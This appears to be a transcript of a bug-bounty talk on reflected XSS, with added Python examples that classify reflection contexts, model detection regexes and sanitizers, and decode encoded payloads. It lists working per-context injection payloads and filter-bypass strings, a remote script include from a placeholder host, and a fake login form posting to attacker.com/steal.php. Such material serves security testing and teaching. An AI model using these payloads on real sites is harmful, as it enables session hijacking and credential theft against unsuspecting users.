    ● Injection attack against users of (otherwise) benign and trusted web sites
    ● Used mostly in targeted attacks (e.g. spear-phishing against administrators)
    ● For example, an attacker can send a link with malicious JavaScript (JS) code to an unsuspecting user
    ● The user's browser has no way to know that the link should not be trusted and executes the JS blindly, effectively giving the attacker access to cookies, session tokens or other sensitive information within the browsing context
  • 3. Real-world (known) cases
  • 4. More about the vulnerability
    ● Considered a critical vulnerability, hence (often) well paid in bug bounty programs
    ● Failure to (properly) sanitize/filter any of <, >, ', " inside the response can introduce the vulnerability
    ● While testing, responses to user-supplied values are inspected for signs of the vulnerability (e.g. the response returning the values in their original form)
    ● Provoking a JS pop-up box with a custom message (e.g. XSS) is universally accepted as a Proof of Concept (PoC) for the existence of the vulnerability
    ● Types: stored (persisting), reflected (temporary) and DOM-based (in-browser)
  • 5. Food for thought :)
  • 6. Testing workflow
    1) Find reflecting input points (e.g. the page's GET parameter values)
    2) Recognize the context of the reflection (e.g. inside <script>...</script>)
    3) Bypass sanitization/filtering and/or protection mechanism(s) (Note: if possible and/or required)
    4) Write the vulnerability exploitation PoC (e.g. ...alert('XSS')...)
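The four workflow steps, as an added Python example that is not part of the talk: a constructed response body reflects a canary value in six places, each reflection is classified by context with a heuristic string scan (not a full HTML parser), and the context selects the PoC payload from the later slides. The canary, the sample HTML, the function names and the `script-code` payload are assumptions; the other payloads are the ones the slides use.

```python
import re

# Constructed canary: an unusual alphanumeric token supplied as the parameter value
CANARY = "zx7q"

# Elements whose content is raw text until their own closing tag
RAW_TEXT_TAGS = ("script", "textarea", "title", "style")

# Constructed response body reflecting the canary in six different contexts
SAMPLE = f"""<!DOCTYPE html><html><head><title>Search: {CANARY}</title>
<script>var q = '{CANARY}'; track(q);</script></head>
<body><!-- SELECT * FROM items WHERE name = '{CANARY}' -->
<input type="text" name="q" value="{CANARY}">
<p>Results for {CANARY}</p>
<textarea>{CANARY}</textarea></body></html>"""


def js_quote_state(code):
    """Quote character we are inside at the end of `code`, or None."""
    quote, i = None, 0
    while i < len(code):
        c = code[i]
        if c == "\\":            # skip the escaped character
            i += 2
            continue
        if quote is None and c in "'\"`":
            quote = c
        elif c == quote:
            quote = None
        i += 1
    return quote


def classify(body, pos):
    """Name the context at offset `pos` of an HTML response body (heuristic scan)."""
    before = body[:pos]
    lower = before.lower()
    if lower.rfind("<!--") > lower.rfind("-->"):
        return "comment"
    for tag in RAW_TEXT_TAGS:
        opened, closed = lower.rfind("<" + tag), lower.rfind("</" + tag)
        if opened > closed:
            if tag != "script":
                return tag
            code = before[before.find(">", opened) + 1:]
            quote = js_quote_state(code)
            return "script-string:" + quote if quote else "script-code"
    if before.rfind("<") > before.rfind(">"):
        return "attribute"
    return "text"


def reflection_contexts(body, canary=CANARY):
    """Steps 1 and 2: every reflection of the canary together with its context."""
    return [(classify(body, m.start()), m.start())
            for m in re.finditer(re.escape(canary), body)]


# Step 4: PoC payload per context (script-code is an assumed addition)
PAYLOADS = {
    "text": "<svg onload=alert(/XSS/)>",
    "attribute": '"><svg onload=alert(/XSS/)>',
    "comment": "--><svg onload=alert(/XSS/)>",
    "script-code": "alert(/XSS/)",
    "textarea": "</textarea><svg onload=alert(/XSS/)>",
    "title": "</title><svg onload=alert(/XSS/)>",
    "style": "</style><svg onload=alert(/XSS/)>",
}


def payload_for(context):
    """In-place JS injection reuses the quote character the reflection sits in."""
    if context.startswith("script-string:"):
        q = context.split(":", 1)[1]
        return f"{q});alert('XSS');var dummy=({q}"
    return PAYLOADS[context]


def reflected_intact(body, value):
    """Slide 4's sign of the vulnerability: the value comes back in its original form."""
    return value in body


if __name__ == "__main__":
    for ctx, off in reflection_contexts(SAMPLE):
        print(f"offset {off:4d}  {ctx:16s}  try: {payload_for(ctx)}")
```

Step 3 is not automated here on purpose: once a context and candidate payload are known, the tester sends the payload and runs `reflected_intact` on the new response; anything that comes back altered points at the filtering or sanitization that has to be bypassed.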
  • 7. Practical example (PoC)
  • 8. Protection mechanism(s). Common (XSS) detection regular expressions:
    ● /<[a-z]/i - (e.g.) <svg, <img - though, there are cases where "benign" tags such as <a> are left un-blacklisted
    ● /\b(java)?script\b/i - (e.g.) <script, <img src="javascript:, etc.
    ● /\bon\w+\s*=/i - (e.g.) <img src=null onerror=... - though, there are cases where <marquee>'s onstart= is left un-blacklisted
    ● /\bsrc\s*=/i - (e.g.) <embed src=..., etc.
    ● /\b\w+\(/i - (e.g.) alert( - though, there are cases where confirm( is left un-blacklisted
  • 9. Sanitization mechanism(s). Common (XSS) server response sanitizations:
    ● Removing all special characters - (e.g.) foo<'">bar → foobar
    ● Replacing all special characters with whitespace - (e.g.) foo<'">bar → foo bar
    ● HTML named entity encoding - (e.g.) foo<'">bar → foo&lt;&apos;&quot;&gt;bar
    ● HTML numeric code point encoding - (e.g.) foo<'">bar → foo&#60;&#39;&#34;&#62;bar
    ● Backslash escaping all special characters - (e.g.) foo<'">bar → foo<\'\">bar (Note: a payload without quotes, such as <script>, is unaffected)
    ● Uppercase conversion - (e.g.) foo<'">bar → FOO<'">BAR (combined with other mechanism(s))
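Slides 8 and 9 side by side, as an added Python example (not code from the talk): the five detection regexes, with the backslashes the transcript lost, run on request values; the six sanitizations run on the value before it is written into the response; `survivors` applies slide 4's test (does the value come back in its original form?). The generic patterns are encoded as written; the "though" cases on slide 8 describe deployments that narrow them (only some tags, only `alert(`), which this block does not model. Function and key names are assumptions.

```python
import re

# Slide 8's detection regexes, backslashes restored; these run on request values
DETECTION = {
    "tag": re.compile(r"<[a-z]", re.I),
    "script": re.compile(r"\b(java)?script\b", re.I),
    "handler": re.compile(r"\bon\w+\s*=", re.I),
    "src": re.compile(r"\bsrc\s*=", re.I),
    "call": re.compile(r"\b\w+\(", re.I),
}


def tripped(value):
    """Names of the detection patterns a request value triggers (empty = passes)."""
    return [name for name, rx in DETECTION.items() if rx.search(value)]


# Slide 9's sanitizations; these run on the value before it is written into the response
def strip_special(v):
    return re.sub(r"[<>'\"]", "", v)


def blank_special(v):
    return re.sub(r"[<>'\"]", " ", v)


def named_entities(v):
    return (v.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
             .replace('"', "&quot;").replace("'", "&apos;"))


def numeric_entities(v):
    return re.sub(r"[&<>'\"]", lambda m: "&#%d;" % ord(m.group()), v)


def backslash_escape(v):
    """addslashes-style: quotes and backslashes get a backslash, < and > are left alone."""
    return re.sub(r"([\\'\"])", r"\\\1", v)


def uppercase(v):
    return v.upper()


SANITIZERS = {
    "strip": strip_special,
    "blank": blank_special,
    "named": named_entities,
    "numeric": numeric_entities,
    "backslash": backslash_escape,
    "upper": uppercase,
}


def survivors(payload):
    """Sanitizers under which the payload is reflected in its original form (slide 4's sign)."""
    return [name for name, fn in SANITIZERS.items() if fn(payload) == payload]


def report(payload):
    """One row of the lab: what the request filter catches, which outputs keep it intact."""
    return {"payload": payload, "tripped": tripped(payload), "survives": survivors(payload)}


if __name__ == "__main__":
    for p in ("<svg/onload=alert(/XSS/)>",
              "<SCRIPT SRC=//DOMAIN.COM/XSS.JS></SCRIPT>",
              "<script>alert(/XSS/)</script>",
              "');prompt`XSS`;var dummy=('",
              '" onclick="alert(/XSS/)'):
        print(report(p))
```

Two rows are worth reading closely. The in-place JS injection `');prompt`XSS`;var dummy=('` trips none of the five request patterns (no `<`, no `on…=`, no `(`), yet survives no response sanitization at all, which is the point of slide 18's note: it needs an unfiltered quote. Conversely `<SCRIPT SRC=//DOMAIN.COM/XSS.JS></SCRIPT>` is caught by three request patterns but is the only payload unchanged by uppercase conversion, because tag and attribute names and host names are case-insensitive while `alert` is not, which is why slide 23 writes it in capitals.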
  • 10. <tag...> (more)
    ● Break out of the <tag...> context with > OR inject an onXXX event handler
      ?vuln="><svg onload=alert(/XSS/)>
      ?vuln=" onclick="alert(/XSS/)
    ● Usability is highly dependent on the context and the available <tag> events (e.g. tags with visibility: hidden require breaking out of the <tag...> context)
  • 11. <tag...> (more)
    ● Even though the attacker's options inside <tag> are rather narrow (e.g. user interaction required), (ab)using CSS via style can help
      ?vuln=" onmouseover=alert(/XSS/) style="display: block; position: absolute; left: 0; top: 0; height: 10000px; width: 10000px; opacity: 0; cursor: default
  • 12. >...<
    ● Injecting outside of the <tag> context and/or scope (e.g. </script>...) requires unfiltered < and >
    ● A proper Content-Type (e.g. text/html) is required, as in all (reflected) XSS cases (e.g. application/json is of no interest, since the browser does not render it as HTML)
      ?vuln=<img src=null onerror=alert(/XSS/)>
      ?vuln=<script>alert(/XSS/)</script>
  • 13. <!--...-->
    ● Requires breaking out of the <!--...--> (i.e. HTML comment) context with -->
    ● Common for (custom) sites with debugging support turned ON (e.g. returning the executed SQL query inside a comment)
      ?vuln=--><svg onload=alert(/XSS/)>
    ● As it explicitly requires usage of a <tag>, it fairly commonly ends up unexploitable (e.g. protections are trigger-happy on occurrence(s) of <[a-zA-Z] inside parameter values)
  • 14. <frame ...>
    ● Injecting a custom <frame> OR onload event handler injection (preferred)
      ?vuln="><frame src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
      ?vuln=" onload="alert(/XSS/)
    ● The base64 above decodes to <script>alert('XSS')</script>
    ● Note: Non-<frame> tags can't be used because of <frameset> restrictions
  • 15. <iframe...>
    ● Break out of the <iframe...> context OR onload event handler injection (preferred)
      ?vuln="></iframe><svg onload=alert(/XSS/)>
      ?vuln=" onload="alert(/XSS/)
  • 16. <input...>
    ● Break out of the <input...> context with > OR onfocus event handler injection (preferred)
      ?vuln=1"><svg onload=alert(/XSS/)>
      ?vuln=1" autofocus onfocus="alert(/XSS/)
  • 17. <input type="hidden"...>
    ● In hidden <input> cases, combined with the inability to break out of the <input...> context (due to filtering of <>), regular onXXX event handler injection doesn't work
    ● Though, the accesskey attribute can be (ab)used to make a user-assisted XSS payload (Alt+Shift+<key>; the exact modifier combination depends on the browser)
      ?vuln=" accesskey="X" onclick="alert(/XSS/)
  • 18. <script>...</script>
    ● Break out of <script>...</script> with </script> OR in-place JS injection (preferred)
      ?vuln=</script><svg onload=alert(/XSS/)>
      ?vuln=foobar');alert('XSS');var dummy=('
    ● Common in third-party advertisement plugins
    ● Note: In-place JS injection doesn't require <>, though in the majority of cases it requires an unfiltered ' or " (interpreter syntax checks)
  • 19. echo $_SERVER['PHP_SELF']
    ● Common finding even on top sites and/or frameworks
    ● Non-sanitized reference to the current script's path
      http://...php/"><svg onload="alert(/XSS/)
    ● Not PHP-specific (though more common there)
    ● Note: JS injection in the path often requires manual URL encoding of non-alphanumeric characters
  • 20. <meta>
    ● Often overlooked, though easy to exploit
    ● Top sites tend to utilize lots of metadata
      ?vuln="><script>alert(/XSS/)</script>
      ?vuln=0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4" http-equiv="refresh
    ● The base64 above decodes to <script>alert(/XSS/)</script>
  • 21. <textarea> and <title>
    ● Injection into <textarea> and <title> enclosures requires the respective explicit closing tags (i.e. </textarea> and </title>)
    ● Important to note because of automated scanners (the majority don't check the context)
    ● <style> is also problematic, though in the case of Internet Explorer a CSS expression can be (ab)used
      ?vuln=</textarea><svg onload=alert(/XSS/)>
  • 22. $_POST
    ● Though not exploitable directly from a link (i.e. the address bar), it is a perfectly valid attack point
    ● Requires a malicious HTML document that has to be loaded inside the victim's web browser
    ● Either a standalone HTML file OR a link that points to the attacker's site hosting the HTML document
  • 23. Protection(s) bypasses (more)
      <svg/onload=alert(/XSS/)>
      prompt`XSS`
      onerror=confirm;throw/XSS/;
      document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,...
      [][(![]+[])[+[]]+([![]]+[][... // JSFuck
      <SCRIPT SRC=//DOMAIN.COM/XSS.JS></SCRIPT>
      <embed src=data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cuM...
      <object data=data:text/html;base64,...
      <video/poster/onerror=alert(/XSS/)>
      </i/style=left:expression(alert('XSS'))>
  • 24. Protection(s) bypasses (more)
      <iframe src=javascript:alert('XSS')>
      <isindex type=submit formaction=&#106&#97&#118&#97&#115&#99&#114&#105&#112...
      <isindex type=image src=null onerror=alert(/XSS/)>
      <iframe/srcdoc=&lt;svg&sol;onload&equals;alert&lpar;&quot;XSS&quot;&rpar;&gt;>
      <img src=null onerror=\u0061\u006c\u0065\u0072\u0074&lpar;&quot;\u0058\u0053\u0053&quot;&rpar;>
      <body style=height:9999px onwheel=prompt(/XSS/)>
      <marquee onstart=confirm(/XSS/)>
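Why the encoded entries on the two bypass slides work, as an added Python example (not the author's code): each helper performs one decoding step the browser performs before the value is executed (attribute character references, named ones like &lpar; and numeric ones with or without a semicolon; JavaScript \uXXXX escapes, which are legal inside identifiers; data: URIs with missing base64 padding; percent-encoding in javascript: URLs), so a filter that matches the raw request value never sees the decoded form. Function names are assumptions; the sample inputs are the slide payloads.

```python
import base64
import html
import re
from urllib.parse import unquote


def attribute_value(raw):
    """What the HTML parser hands to an attribute: character references decoded
    (named ones such as &lpar; and numeric ones with or without a trailing ';')."""
    return html.unescape(raw)


def js_unicode(src):
    """Resolve \\uXXXX escapes; JavaScript accepts them inside identifiers, so
    \\u0061\\u006c\\u0065\\u0072\\u0074(...) is a call to alert."""
    return re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), src)


def data_uri(uri):
    """Split a data: URI into (media type, decoded bytes); missing base64 padding is tolerated,
    as browsers tolerate it (the slides drop the trailing '=')."""
    m = re.fullmatch(r"data:([^,;]*)((?:;[^,]*)*),(.*)", uri, re.S)
    if not m:
        raise ValueError("not a data: URI")
    mime, params, payload = m.groups()
    if ";base64" in params:
        payload += "=" * (-len(payload) % 4)
        return mime, base64.b64decode(payload)
    return mime, unquote(payload).encode()


def numeric_refs_no_semicolon(s):
    """Encode every character as &#NNN without ';', the form used in the formaction payload."""
    return "".join("&#%d" % ord(c) for c in s)


def javascript_url_body(url):
    """Script a javascript: URL runs: everything after the scheme, percent-decoded."""
    scheme, _, body = url.partition(":")
    if scheme.strip().lower() != "javascript":
        return None
    return unquote(body)


def srcdoc_document(raw_attr):
    """srcdoc is decoded once as an attribute, then parsed as a fresh HTML document,
    so entity-encoded markup inside it becomes live markup."""
    return attribute_value(raw_attr)


def demo():
    """The slide payloads mapped to the text the interpreter finally sees."""
    return {
        "srcdoc": srcdoc_document(
            "&lt;svg&sol;onload&equals;alert&lpar;&quot;XSS&quot;&rpar;&gt;"),
        "onerror": js_unicode(attribute_value(
            r"\u0061\u006c\u0065\u0072\u0074&lpar;&quot;\u0058\u0053\u0053&quot;&rpar;")),
        "meta refresh": data_uri(
            "data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4")[1].decode(),
        "formaction": attribute_value(numeric_refs_no_semicolon("javascript:alert(/XSS/)")),
        "iframe src": javascript_url_body("javascript:alert('XSS')"),
    }


if __name__ == "__main__":
    for where, seen in demo().items():
        print(f"{where:13s} -> {seen}")
```

For a defender the same helpers are the normalisation step: run them in the order the browser will (percent-decode the URL, decode the attribute, then resolve JS escapes) before applying any pattern from slide 8, otherwise the `\u0061...` and `&lpar;` forms pass straight through.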
  • 25. p.s. HTML injection
    ● In cases when JavaScript injection (i.e. XSS) is not possible, HTML injection is also a valid attack point, though not as valuable
    ● Most common scenario is the usage of protection mechanism(s) while lacking any sanitization/filtering whatsoever
    ● "Evil link" scenario
    ● "Fake login" scenario - (e.g.) <form action="//www.attacker.com/steal.php">...
    ● "Fake defacement" scenario - (e.g.) <h1>This site has been hacked by l33tcr3w</h1>
  • 26. p.p.s. Recommended resources: www.openbugbounty.org, html5sec.org
  • 27. Questions?